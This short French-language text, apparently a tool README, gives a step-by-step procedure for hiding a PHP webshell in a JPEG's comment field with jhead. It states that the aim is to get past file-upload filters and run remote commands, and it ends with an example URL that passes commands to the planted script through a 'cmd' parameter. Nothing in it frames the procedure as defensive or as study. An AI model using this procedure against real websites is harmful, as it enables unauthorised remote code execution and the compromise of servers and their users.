
Script PHP et guide pour injecter des webshells PHP dans des images JPEG à l'aide de Jhead. Utilisé pour contourner les filtres de téléversement de fichiers et exécuter des commandes à distance via des fichiers image spécialement conçus.
$ pkg install vim ou apt-get install vim
$ pkg install jhead ou apt-get install jhead
$ jhead -h (pour l'aide)
$ jhead -purejpg yourfiles.jpg
$ jhead -ce yourfiles.jpg
Appuyez sur ESC, tapez :x pour enregistrer
$ jhead yourfiles.jpg
Exemple : site.com/youfiles.php?cmd=Command Here
